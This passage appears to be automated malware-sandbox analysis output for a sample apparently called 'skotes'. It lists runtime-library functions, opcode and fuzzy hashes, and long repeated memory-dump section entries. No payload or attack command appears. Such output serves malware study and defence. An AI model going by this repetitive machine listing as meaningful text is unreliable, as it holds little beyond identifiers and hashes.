                                                                                                                • Opcode ID: a74f778afeab8b57a970de5bac8ba6fd87340af4c551b8f913b2fc6367d58e57
                                                                                                                • Instruction ID: 6a989129e5e394c1575c7ed54ad1e8801b99ac7a2f7168339d3355ae18e9d615
                                                                                                                • Opcode Fuzzy Hash: a74f778afeab8b57a970de5bac8ba6fd87340af4c551b8f913b2fc6367d58e57
                                                                                                                • Instruction Fuzzy Hash: 31C1AE71D01258DFCF15CFE8C880AEDBBB5AF49314F28416EE855BB242D634AE46CB94
                                                                                                                APIs
                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 00782846
                                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 007828E0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 2970364248-768041998
                                                                                                                • Opcode ID: 35891320b5b4a4f5207daf58f13488717f1d6139c83b2c6bf8b070b4bac74a31
                                                                                                                • Instruction ID: 0cd8a238a0912ee971eccd2c28349bf04c19f32c83ac3058fc4023c917c69903
                                                                                                                • Opcode Fuzzy Hash: 35891320b5b4a4f5207daf58f13488717f1d6139c83b2c6bf8b070b4bac74a31
                                                                                                                • Instruction Fuzzy Hash: A9718071A00248DBDF04DFA8D885BDDFBB5EF59310F14812DE815A7382E778A944CBA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: =L-t$list too long
                                                                                                                • API String ID: 0-635664661
                                                                                                                • Opcode ID: 676243dc09987dba4dd6275009843f0ebad0cd55077631faa469b1452b25e887
                                                                                                                • Instruction ID: 2980a4545479c0a7a1f86396c706c34f88b15dfb2849fc72897da5c25351f9d7
                                                                                                                • Opcode Fuzzy Hash: 676243dc09987dba4dd6275009843f0ebad0cd55077631faa469b1452b25e887
                                                                                                                • Instruction Fuzzy Hash: 3261A3B0944758DBDF20DF64DD89B99B7B4FF08700F1045AAE80CAB281EB78AA51CF51
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1418687624-768041998
                                                                                                                • Opcode ID: fea8a575edae4e04dc49a87e06a22581c655df1db04cc4a376d7f3da554dd8d3
                                                                                                                • Instruction ID: 4fdafd82beda96fa2ff82269672a23b2f807015c162567546498aa1277b4258d
                                                                                                                • Opcode Fuzzy Hash: fea8a575edae4e04dc49a87e06a22581c655df1db04cc4a376d7f3da554dd8d3
                                                                                                                • Instruction Fuzzy Hash: 7741F170E41609DFEF11EFA8D9487AABBA9FF15B10F048169E80597242E739DB04C7E1
                                                                                                                APIs
                                                                                                                • __Cnd_destroy_in_situ.LIBCPMT ref: 00797AF8
                                                                                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 00797B01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                • String ID: d+~
                                                                                                                • API String ID: 1432671424-1901206460
                                                                                                                • Opcode ID: 7076c794e1aa01e9758eb36ed0c386c6b721f015fdca11212af120bacc0a4831
                                                                                                                • Instruction ID: 6cd9c05a20dc4d43793f01878657d8705a11b49fd7dbd1786d09c20131888e02
                                                                                                                • Opcode Fuzzy Hash: 7076c794e1aa01e9758eb36ed0c386c6b721f015fdca11212af120bacc0a4831
                                                                                                                • Instruction Fuzzy Hash: B931D4B1A14704DFDB24DFA8F845A5BB7E8EF14310F104A2EE945C3242E779EA54C7A1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                • String ID: 8"~$`'~
                                                                                                                • API String ID: 3903695350-10081231
                                                                                                                • Opcode ID: 0b34aadf12cbb0d247cf52cf520ac0e4caec4f3d63730e3699f0dac047d62a06
                                                                                                                • Instruction ID: 57ce17a0b5eb027aa8e997ea0ce86c989c2f93aa9d63570e0661dc64cbfde434
                                                                                                                • Opcode Fuzzy Hash: 0b34aadf12cbb0d247cf52cf520ac0e4caec4f3d63730e3699f0dac047d62a06
                                                                                                                • Instruction Fuzzy Hash: 58313931600646EFEB21AA39DC49BDBB3E8EF00752F14442AE459D7599DF79AC80CB21
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
